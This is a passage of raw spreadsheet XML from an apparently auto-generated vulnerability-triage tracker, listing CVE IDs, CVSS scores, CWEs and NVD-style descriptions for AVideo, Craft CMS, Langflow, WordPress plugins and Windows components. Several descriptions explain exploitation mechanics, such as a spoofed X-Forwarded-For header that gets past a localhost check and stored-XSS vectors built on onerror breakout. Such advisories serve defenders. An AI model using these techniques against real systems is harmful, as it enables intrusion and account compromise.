t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1722" s="5" t="inlineStr" /><c r="Q1722" s="5" t="inlineStr"><is><t>CWE-532</t></is></c><c r="R1722" s="5" t="inlineStr"><is><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is></c><c r="S1722" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86597</t></is></c></row><row r="1723"><c r="A1723" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1723" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1723" s="5" t="inlineStr"><is><t>CVE-2026-86726</t></is></c><c r="D1723" s="5" t="n"><v>6.5</v></c><c r="E1723" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1723" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1723" s="5" t="inlineStr" /><c r="H1723" s="5" t="n"><v>0.003</v></c><c r="I1723" s="5" t="inlineStr" /><c r="J1723" s="5" t="inlineStr" /><c r="K1723" s="5" t="inlineStr" /><c r="L1723" s="5" t="inlineStr" /><c r="M1723" s="5" t="inlineStr" /><c r="N1723" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1723" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1723" s="5" t="inlineStr" /><c r="Q1723" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="R1723" s="5" t="inlineStr"><is><t>AVideo through 29.0 contains an information disclosure vulnerability in restreamsActive.json.php that allows authenticated streamers to enumerate source stream keys and identities of all other streamers' active restreams. The endpoint fails to filter results by user ownership, exposing sensitive transmission credentials and streamer identity across all accounts to any user with streaming capability.</t></is></c><c r="S1723" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86726</t></is></c></row><row r="1724"><c r="A1724" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1724" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1724" s="5" t="inlineStr"><is><t>CVE-2026-86731</t></is></c><c r="D1724" s="5" t="n"><v>6.5</v></c><c r="E1724" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1724" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1724" s="5" t="inlineStr" /><c r="H1724" s="5" t="n"><v>0.002</v></c><c r="I1724" s="5" t="inlineStr" /><c r="J1724" s="5" t="inlineStr" /><c r="K1724" s="5" t="inlineStr" /><c r="L1724" s="5" t="inlineStr" /><c r="M1724" s="5" t="inlineStr" /><c r="N1724" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1724" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1724" s="5" t="inlineStr" /><c r="Q1724" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1724" s="5" t="inlineStr"><is><t>Craft CMS versions 5.0.0-RC1 through 5.10.11 are missing an admin-target guard in UsersController::actionActivateUser (the users/activate-user action). While the action requires the administrateUsers permission, it does not call requireAdmin() when the targeted user is an administrator, unlike the mirror action actionDeactivateUser. As a result, an authenticated control panel user who is not an administrator but holds the administrateUsers permission can activate a pending or deliberately deactivated administrator account, which can lead to permission escalation when combined with resetting that account's password. The issue is fixed in Craft CMS 5.10.12.</t></is></c><c r="S1724" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86731</t></is></c></row><row r="1725"><c r="A1725" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1725" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1725" s="5" t="inlineStr"><is><t>CVE-2026-9186</t></is></c><c r="D1725" s="5" t="n"><v>6.5</v></c><c r="E1725" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1725" s="5" t="inlineStr"><is><t>psirt@us.ibm.com</t></is></c><c r="G1725" s="5" t="inlineStr" /><c r="H1725" s="5" t="n"><v>0.003</v></c><c r="I1725" s="5" t="inlineStr" /><c r="J1725" s="5" t="inlineStr" /><c r="K1725" s="5" t="inlineStr"><is><t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t></is></c><c r="L1725" s="5" t="inlineStr" /><c r="M1725" s="5" t="inlineStr" /><c r="N1725" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1725" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1725" s="5" t="inlineStr" /><c r="Q1725" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R1725" s="5" t="inlineStr"><is><t>IBM Langflow OSS 1.0.0 through 1.11.2 allows remote authenticated attackers to bypass localhost-only MCP configuration installation by spoofing X-Forwarded-For: 127.0.0.1 header, enabling arbitrary writes to IDE config files (~/.cursor/mcp.json, etc.).</t></is></c><c r="S1725" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9186</t></is></c></row><row r="1726"><c r="A1726" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1726" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1726" s="5" t="inlineStr"><is><t>CVE-2026-12230</t></is></c><c r="D1726" s="5" t="n"><v>6.4</v></c><c r="E1726" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1726" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1726" s="5" t="inlineStr" /><c r="H1726" s="5" t="n"><v>0.002</v></c><c r="I1726" s="5" t="inlineStr" /><c r="J1726" s="5" t="inlineStr" /><c r="K1726" s="5" t="inlineStr" /><c r="L1726" s="5" t="inlineStr" /><c r="M1726" s="5" t="inlineStr" /><c r="N1726" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1726" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1726" s="5" t="inlineStr" /><c r="Q1726" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1726" s="5" t="inlineStr"><is><t>The LearnPress – WordPress LMS Plugin for Create and Sell Online Courses plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'layout_custom_css' parameter in all versions up to, and including, 4.3.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t></is></c><c r="S1726" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12230</t></is></c></row><row r="1727"><c r="A1727" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1727" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1727" s="5" t="inlineStr"><is><t>CVE-2026-18404</t></is></c><c r="D1727" s="5" t="n"><v>6.4</v></c><c r="E1727" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1727" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1727" s="5" t="inlineStr" /><c r="H1727" s="5" t="n"><v>0.002</v></c><c r="I1727" s="5" t="inlineStr" /><c r="J1727" s="5" t="inlineStr" /><c r="K1727" s="5" t="inlineStr" /><c r="L1727" s="5" t="inlineStr" /><c r="M1727" s="5" t="inlineStr" /><c r="N1727" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1727" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1727" s="5" t="inlineStr" /><c r="Q1727" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1727" s="5" t="inlineStr"><is><t>The Social Chat – Click To Chat App Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'consent_message' JSON Attribute in .qlwapp data-box in all versions up to, and including, 8.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The exploit requires no user interaction beyond page load, as setting auto_open and consent_enabled to 'yes' in the injected data-box JSON causes the consent box — and the embedded script — to execute immediately on page load.</t></is></c><c r="S1727" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18404</t></is></c></row><row r="1728"><c r="A1728" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1728" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1728" s="5" t="inlineStr"><is><t>CVE-2026-33388</t></is></c><c r="D1728" s="5" t="n"><v>6.4</v></c><c r="E1728" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1728" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G1728" s="5" t="inlineStr" /><c r="H1728" s="5" t="n"><v>0.003</v></c><c r="I1728" s="5" t="inlineStr" /><c r="J1728" s="5" t="inlineStr" /><c r="K1728" s="5" t="inlineStr" /><c r="L1728" s="5" t="inlineStr" /><c r="M1728" s="5" t="inlineStr" /><c r="N1728" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1728" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1728" s="5" t="inlineStr" /><c r="Q1728" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R1728" s="5" t="inlineStr"><is><t>An access control vulnerability was discovered in the Credentials Manager functionality due to insufficient validation of user privileges. A remote authenticated user with limited privileges can view a limited subset of the available entries in the Credentials Manager. The actual credential values are not directly visible, but the user can delete entries or edit their properties. An attacker who deletes or edits an entry can disrupt authentication for dependent devices, and one who manipulates an entry's configuration may be able to indirectly obtain the credentials.</t></is></c><c r="S1728" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33388</t></is></c></row><row r="1729"><c r="A1729" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1729" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1729" s="5" t="inlineStr"><is><t>CVE-2026-3853</t></is></c><c r="D1729" s="5" t="n"><v>6.4</v></c><c r="E1729" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1729" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1729" s="5" t="inlineStr" /><c r="H1729" s="5" t="n"><v>0.002</v></c><c r="I1729" s="5" t="inlineStr" /><c r="J1729" s="5" t="inlineStr" /><c r="K1729" s="5" t="inlineStr" /><c r="L1729" s="5" t="inlineStr" /><c r="M1729" s="5" t="inlineStr" /><c r="N1729" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1729" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1729" s="5" t="inlineStr" /><c r="Q1729" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1729" s="5" t="inlineStr"><is><t>The Divi theme for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the `image_src` attribute of the `et_pb_video_slider_item` shortcode in all versions up to, and including, 4.27.6. This is due to the `image_src` field not being included in the `$url_options` whitelist (which only contains `url`, `button_link`, `button_url`), so it never receives `esc_url_raw()` at save time. On the server side, the value is rendered into a `data-image` HTML attribute using `esc_attr()`, which encodes double quotes as `&amp;quot;`. However, the client-side JavaScript carousel code in `custom.unified.js` reads this attribute using jQuery's `.data('image')`, which returns the browser-decoded value (with `&amp;quot;` decoded back to `"`). The decoded value is then concatenated directly into an HTML string and injected into the DOM via `jQuery.after()` without re-escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user hovers over the carousel thumbnail.</t></is></c><c r="S1729" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-3853</t></is></c></row><row r="1730"><c r="A1730" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1730" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1730" s="5" t="inlineStr"><is><t>CVE-2026-69874</t></is></c><c r="D1730" s="5" t="n"><v>6.4</v></c><c r="E1730" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1730" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1730" s="5" t="inlineStr" /><c r="H1730" s="5" t="n"><v>0.003</v></c><c r="I1730" s="5" t="inlineStr" /><c r="J1730" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1730"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730" s="5" t="inlineStr" /><c r="M1730" s="5" t="inlineStr" /><c r="N1730" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1730" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1730" s="5" t="inlineStr" /><c r="Q1730" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="R1730" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows ALPC allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1730" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69874</t></is></c></row><row r="1731"><c r="A1731" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1731" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1731" s="5" t="inlineStr"><is><t>CVE-2026-69878</t></is></c><c r="D1731" s="5" t="n"><v>6.4</v></c><c r="E1731" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1731" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1731" s="5" t="inlineStr" /><c r="H1731" s="5" t="n"><v>0.003</v></c><c r="I1731" s="5" t="inlineStr" /><c r="J1731" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1731" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1731" s="5" t="inlineStr" /><c r="M1731" s="5" t="inlineStr" /><c r="N1731" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1731" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1731" s="5" t="inlineStr" /><c r="Q1731" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1731" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code locally.</t></is></c><c r="S1731" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69878</t></is></c></row><row r="1732"><c r="A1732" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1732" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1732" s="5" t="inlineStr"><is><t>CVE-2026-70582</t></is></c><c r="D1732" s="5" t="n"><v>6.4</v></c><c r="E1732" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1732" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1732" s="5" t="inlineStr" /><c r="H1732" s="5" t="n"><v>0.002</v></c><c r="I1732" s="5" t="inlineStr" /><c r="J1732" s="5" t="inlineStr" /><c r="K1732" s="5" t="inlineStr" /><c r="L1732" s="5" t="inlineStr" /><c r="M1732" s="5" t="inlineStr" /><c r="N1732" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1732" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1732" s="5" t="inlineStr" /><c r="Q1732" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="R1732" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Instrumentation allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1732" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70582</t></is></c></row><row r="1733"><c r="A1733" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1733" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1733" s="5" t="inlineStr"><is><t>CVE-2026-71338</t></is></c><c r="D1733" s="5" t="n"><v>6.4</v></c><c r="E1733" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1733" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1733" s="5" t="inlineStr" /><c r="H1733" s="5" t="n"><v>0.003</v></c><c r="I1733" s="5" t="inlineStr" /><c r="J1733" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1733" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1733" s="5" t="inlineStr" /><c r="M1733" s="5" t="inlineStr" /><c r="N1733" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1733" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1733" s="5" t="inlineStr" /><c r="Q1733" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="R1733" s="5" t="inlineStr"><is><t>Double free in Windows Failover Cluster allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1733" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71338</t></is></c></row><row r="1734"><c r="A1734" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1734" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1734" s="5" t="inlineStr"><is><t>CVE-2026-72947</t></is></c><c r="D1734" s="5" t="n"><v>6.4</v></c><c r="E1734" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1734" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1734" s="5" t="inlineStr" /><c r="H1734" s="5" t="n"><v>0.003</v></c><c r="I1734" s="5" t="inlineStr" /><c r="J1734" s="5" t="inlineStr" /><c r="K1734" s="5" t="inlineStr" /><c r="L1734" s="5" t="inlineStr" /><c r="M1734" s="5" t="inlineStr" /><c r="N1734" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1734" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1734" s="5" t="inlineStr" /><c r="Q1734" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="R1734" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows File History Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1734" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72947</t></is></c></row><row r="1735"><c r="A1735" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1735" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1735" s="5" t="inlineStr"><is><t>CVE-2026-76573</t></is></c><c r="D1735" s="5" t="n"><v>6.4</v></c><c r="E1735" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1735" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1735" s="5" t="inlineStr" /><c r="H1735" s="5" t="n"><v>0.002</v></c><c r="I1735" s="5" t="inlineStr" /><c r="J1735" s="5" t="inlineStr" /><c r="K1735" s="5" t="inlineStr" /><c r="L1735" s="5" t="inlineStr" /><c r="M1735" s="5" t="inlineStr" /><c r="N1735" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1735" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1735" s="5" t="inlineStr" /><c r="Q1735" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1735" s="5" t="inlineStr"><is><t>The Pods – Custom Content Types and Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'not_found' Shortcode Attribute in all versions up to, and including, 3.3.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t></is></c><c r="S1735" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76573</t></is></c></row><row r="1736"><c r="A1736" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1736" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1736" s="5" t="inlineStr"><is><t>CVE-2026-76931</t></is></c><c r="D1736" s="5" t="n"><v>6.4</v></c><c r="E1736" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1736" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1736" s="5" t="inlineStr" /><c r="H1736" s="5" t="n"><v>0.002</v></c><c r="I1736" s="5" t="inlineStr" /><c r="J1736" s="5" t="inlineStr" /><c r="K1736" s="5" t="inlineStr" /><c r="L1736" s="5" t="inlineStr" /><c r="M1736" s="5" t="inlineStr" /><c r="N1736" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1736" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1736" s="5" t="inlineStr" /><c r="Q1736" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1736" s="5" t="inlineStr"><is><t>The Zephyr Project Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘message’ parameter in all versions up to, and including, 3.3.205 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Custom-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability can only be exploited when the 'Directly link to project' plugin setting is disabled.</t></is></c><c r="S1736" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76931</t></is></c></row><row r="1737"><c r="A1737" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1737" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1737" s="5" t="inlineStr"><is><t>CVE-2026-77887</t></is></c><c r="D1737" s="5" t="n"><v>6.4</v></c><c r="E1737" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1737" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1737" s="5" t="inlineStr" /><c r="H1737" s="5" t="n"><v>0.002</v></c><c r="I1737" s="5" t="inlineStr" /><c r="J1737" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1737" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1737" s="5" t="inlineStr" /><c r="M1737" s="5" t="inlineStr" /><c r="N1737" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1737" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1737" s="5" t="inlineStr" /><c r="Q1737" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1737" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to execute code locally.</t></is></c><c r="S1737" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77887</t></is></c></row><row r="1738"><c r="A1738" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1738" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1738" s="5" t="inlineStr"><is><t>CVE-2026-77891</t></is></c><c r="D1738" s="5" t="n"><v>6.4</v></c><c r="E1738" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1738" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1738" s="5" t="inlineStr" /><c r="H1738" s="5" t="n"><v>0.002</v></c><c r="I1738" s="5" t="inlineStr" /><c r="J1738" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1738" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1738" s="5" t="inlineStr" /><c r="M1738" s="5" t="inlineStr" /><c r="N1738" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1738" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1738" s="5" t="inlineStr" /><c r="Q1738" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1738" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to execute code locally.</t></is></c><c r="S1738" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77891</t></is></c></row><row r="1739"><c r="A1739" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1739" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1739" s="5" t="inlineStr"><is><t>CVE-2026-85414</t></is></c><c r="D1739" s="5" t="n"><v>6.4</v></c><c r="E1739" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1739" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1739" s="5" t="inlineStr" /><c r="H1739" s="5" t="n"><v>0.002</v></c><c r="I1739" s="5" t="inlineStr" /><c r="J1739" s="5" t="inlineStr" /><c r="K1739" s="5" t="inlineStr" /><c r="L1739" s="5" t="inlineStr" /><c r="M1739" s="5" t="inlineStr" /><c r="N1739" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1739" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1739" s="5" t="inlineStr" /><c r="Q1739" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1739" s="5" t="inlineStr"><is><t>The Gallery : FooGallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'custom_settings' Shortcode Attribute in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t></is></c><c r="S1739" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85414</t></is></c></row><row r="1740"><c r="A1740" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1740" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1740" s="5" t="inlineStr"><is><t>CVE-2026-8623</t></is></c><c r="D1740" s="5" t="n"><v>6.4</v></c><c r="E1740" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1740" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1740" s="5" t="inlineStr" /><c r="H1740" s="5" t="n"><v>0.002</v></c><c r="I1740" s="5" t="inlineStr" /><c r="J1740" s="5" t="inlineStr" /><c r="K1740" s="5" t="inlineStr" /><c r="L1740" s="5" t="inlineStr" /><c r="M1740" s="5" t="inlineStr" /><c r="N1740" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1740" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1740" s="5" t="inlineStr" /><c r="Q1740" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1740" s="5" t="inlineStr"><is><t>The Dear Flipbook – PDF Flipbook, 3D Flipbook, PDF embed, PDF viewer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'post_content (class attribute of .dvcss element)'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The payload is embedded as a Base64-encoded JSON object in a CSS class name on a Custom HTML block; the frontend parseCSSElements() function decodes it client-side with atob() and JSON.parse() and renders the logo property as raw HTML, meaning no server-side or client-side sanitization intercepts the malicious script before DOM insertion.</t></is></c><c r="S1740" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-8623</t></is></c></row><row r="1741"><c r="A1741" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1741" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1741" s="5" t="inlineStr"><is><t>CVE-2026-8625</t></is></c><c r="D1741" s="5" t="n"><v>6.4</v></c><c r="E1741" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1741" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1741" s="5" t="inlineStr" /><c r="H1741" s="5" t="n"><v>0.002</v></c><c r="I1741" s="5" t="inlineStr" /><c r="J1741" s="5" t="inlineStr" /><c r="K1741" s="5" t="inlineStr" /><c r="L1741" s="5" t="inlineStr" /><c r="M1741" s="5" t="inlineStr" /><c r="N1741" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1741" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1741" s="5" t="inlineStr" /><c r="Q1741" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1741" s="5" t="inlineStr"><is><t>The Dear Flipbook – PDF Flipbook, 3D Flipbook, PDF embed, PDF viewer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'post_content (Custom HTML block inner HTML)' parameter in all versions up to, and including, 2.4.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. A Contributor-level attacker can insert a crafted .df-element div with data-df-lightbox='thumb' via a Custom HTML block, whose inner HTML is passed as the title argument to parseThumbs() at render time, enabling both innerHTML injection into a span element and attribute breakout via an onerror handler on a constructed img element.</t></is></c><c r="S1741" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-8625</t></is></c></row><row r="1742"><c r="A1742" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1742" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1742" s="5" t="inlineStr"><is><t>CVE-2026-53639</t></is></c><c r="D1742" s="5" t="n"><v>6.3</v></c><c r="E1742" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1742" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1742" s="5" t="inlineStr" /><c r="H1742" s="5" t="n"><v>0.005</v></c><c r="I1742" s="5" t="inlineStr" /><c r="J1742" s="5" t="inlineStr" 